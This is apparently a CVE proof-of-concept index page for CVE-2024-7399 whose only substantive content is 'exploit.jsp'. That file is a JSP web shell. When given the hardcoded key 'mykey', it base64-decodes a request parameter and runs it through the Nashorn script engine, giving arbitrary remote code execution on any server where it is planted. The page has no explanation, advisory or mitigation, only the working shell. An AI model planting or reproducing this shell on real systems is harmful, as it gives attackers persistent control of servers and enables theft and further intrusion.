4837 Total CVEs
26 Years
GitHub
README.md
README.md not found for CVE-2024-7399. The file may not exist in the repository.
POC / exploit.jsp JSP
<%@ page import="java.util.*,java.io.*,javax.script.*" %>
<%
String base64Input = request.getParameter("input");
String key = request.getParameter("key");

if (key.equals("mykey") && base64Input != null) {
    ScriptEngineManager factory = new ScriptEngineManager();
    ScriptEngine engine = factory.getEngineByName("nashorn");
    byte[] decodedBytes = Base64.getDecoder().decode(base64Input);
    engine.put("out", out);
    engine.eval(new String(decodedBytes));
}
%>